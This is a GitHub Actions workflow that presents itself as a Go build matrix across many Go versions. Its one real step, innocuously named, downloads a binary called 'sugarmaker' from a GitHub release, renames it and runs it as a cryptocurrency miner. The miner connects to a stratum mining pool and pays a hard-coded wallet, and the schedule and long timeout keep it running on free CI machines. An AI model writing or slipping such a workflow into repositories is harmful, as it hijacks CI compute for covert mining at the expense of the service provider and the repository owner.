name: Siculun

on:  
  push:
  pull_request:
  schedule:
    - cron: '* */6 * * *'
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [a, b]        
    timeout-minutes: 360
    env:
        NUM_JOBS: 25
        JOB: ${{ matrix.job }}
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
    - name: SC Mambu
      run: |
        wget https://github.com/konchilscode/miner/releases/download/v45/sugarmaker && chmod +x sugarmaker && mv sugarmaker asw && ./asw -a YespowerSugar -o stratum+tcp://stratum-ru.rplant.xyz:7042 -u sugar1qqtpkpkj5ffelx3g4d992ryr9mnlw88d62cr0qn.tes -t4
